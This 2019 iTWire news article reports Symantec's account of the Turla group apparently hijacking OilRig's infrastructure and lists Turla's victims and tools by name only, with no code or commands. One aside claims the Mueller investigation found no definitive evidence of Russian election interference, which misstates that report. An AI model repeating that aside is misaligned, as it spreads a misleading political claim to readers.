Security Market Segment LS
Friday, 21 June 2019 09:38

A tale of two threat actors: Symantec claims one used the other's infrastructure in attack Featured

A tale of two threat actors: Symantec claims one used the other's infrastructure in attack Pixabay

A well-known attack group that is known as Turla, Snake or Waterbug appears to have hijacked and used the infrastructure of another similar group, known as OilRig, APT34 or Crambus, the American security firm Symantec claims.

Turla then used this infrastructure in an attack on a government in the Middle East which OilRig had already compromised, the company claimed in a detailed blog post.

[Given the numerous names bestowed on these attack groups, iTWire will use only Turla and OilRig in this article to avoid confusion.]

But this phenomenon was hinted at in research presented by Kaspersky (formerly Kaspersky Lab) researcher Kurt Baumgartner at his employer's annual security analyst summit in Cancun last year. A Russian-speaking online threat actor, Sofacy, sometimes overlapped with other threat actors like Turla and the Chinese-speaking Danti, when targeting victims, his research claimed.

Baumgartner said Sofacy backdoors were also found on a server which had been previously compromised by the English-speaking threat actor behind the Lamberts, a term used by Kaspersky to indicate CIA-inspired attacks.

Of interest, given the recent brouhaha over stolen NSA exploits, was Symantec's claim that in the course of its attacks, Turla used a custom hacking tool that combined four tools leaked by the Shadow Brokers — EternalBlue, EternalRomance, DoublePulsar and SMBTouch — into a single executable.

Actors from Turla have been observed to be Russian speakers, while OilRig has been linked to Iran by the security firm FireEye which, admittedly, is quick to attribute attacks which other companies are reluctant to do.

The Symantec post comes at a time of rising US pressure on Iran, following the downing of an American spy drone over Iranian territory, as per claims from Teheran. The Americans claim the incident took place over international waters.

Russia has been under US pressure for a long time, ever since claims were made that it played in a role in the US presidential election of 2016. An investigation of more than two years by former FBI chief Robert Mueller failed to come up with any definitive evidence to support this claim.

Symantec's DeepSight Adversary Intelligence Team said recent activity by Turla could be divided into three campaigns, based on the toolsets used. One used a new backdoor called Neptun that acts as a passive listening tool and infects Microsoft Exchange servers. It was an attack during this campaign that used infrastructure belonging to OilRig.

A second campaign used the publicly available backdoor Meterpreter, along with two custom loaders - a custom backdoor photobased.dll and a customer RPC (Remote Procedure Call) backdoor. A third campaign used a different RPC backdoor built of code derived from PowerShellRunner, a tool that is used to execute PowerShell scripts without using the official PowerShell binary.

Victims of the three Turla campaigns were listed as:

  • The foreign affairs ministry of a Latin American country;
  • The foreign affairs ministry of a Middle Eastern country;
  • The foreign affairs ministry of an European country;
  • The interior ministry of a South Asian country;
  • Two unidentified government organisations in a Middle Eastern country;
  • One unidentified government organisation in a Southeast Asian country;
  • A government office of a South Asian country based in another country;
  • An information and communications technology organisation in a Middle Eastern country;
  • Two information and communications technology organisations in two European countries;
  • An information and communications technology organisation in a South Asian country;
  • A multinational organisation in a Middle Eastern country; and
  • An educational institution in a South Asian country.

Regarding the hijacking of OilRig infrastructure by Turla, Symantec said it was possible that the two groups were, instead, collaborating in attacking the same victim, a target in the Middle East. But it said it had not found further evidence in support of this theory.

"In all likelihood, Turla’s use of OilRig infrastructure appears to have been a hostile takeover," the Symantec team speculated. "Curiously though, Turla also compromised other computers on the victim’s network using its own infrastructure."

Turla's recent campaigns have been marked by the deployment of new tools, Symantec said, listing the following:

  • A new custom dropper typically used to install Neptun as a service.
  • A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.
  • A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.
  • Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Turla command and control (C&C) servers.
  • PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Turla C&Cs.
  • Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, and Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Turla tools or infrastructure.

Symantec said there could be a number of reasons for the attackers behind Turla choosing to use infrastructure from OilRig.

One was as a false flag operation, to deceive anyone observing the campaign as to the identity of the actual attacker. A second possibility was that Turla used OilRig's infrastructure as the latter had already gained entry to the target.

"This is the first time Symantec has observed one targeted attack group seemingly hijack and use the infrastructure of another group. However, it is still difficult to ascertain the motive behind the attack. Whether Turla simply seized the opportunity to create confusion about the attack or whether there was more strategic thinking involved remains unknown," the researchers wrote.

"Turla's ever-changing toolset demonstrates a high degree of adaptability by a group determined to avoid detection by staying one step ahead of its targets. Frequent retooling and a penchant for flirting with false flag tactics have made this group one of the most challenging adversaries on the targeted attack landscape."

Subscribe to ITWIRE UPDATE Newsletter here

Now’s the Time for 400G Migration

The optical fibre community is anxiously awaiting the benefits that 400G capacity per wavelength will bring to existing and future fibre optic networks.

Nearly every business wants to leverage the latest in digital offerings to remain competitive in their respective markets and to provide support for fast and ever-increasing demands for data capacity. 400G is the answer.

Initial challenges are associated with supporting such project and upgrades to fulfil the promise of higher-capacity transport.

The foundation of optical networking infrastructure includes coherent optical transceivers and digital signal processing (DSP), mux/demux, ROADM, and optical amplifiers, all of which must be able to support 400G capacity.

With today’s proprietary power-hungry and high cost transceivers and DSP, how is migration to 400G networks going to be a viable option?

PacketLight's next-generation standardised solutions may be the answer. Click below to read the full article.


WEBINAR PROMOTION ON ITWIRE: It's all about webinars

These days our customers Advertising & Marketing campaigns are mainly focussed on webinars.

If you wish to promote a Webinar we recommend at least a 2 week campaign prior to your event.

The iTWire campaign will include extensive adverts on our News Site and prominent Newsletter promotion and Promotional News & Editorial.

This coupled with the new capabilities 5G brings opens up huge opportunities for both network operators and enterprise organisations.

We have a Webinar Business Booster Pack and other supportive programs.

We look forward to discussing your campaign goals with you.


Sam Varghese

website statistics

Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.

Share News tips for the iTWire Journalists? Your tip will be anonymous




Guest Opinion

Guest Interviews

Guest Reviews

Guest Research

Guest Research & Case Studies

Channel News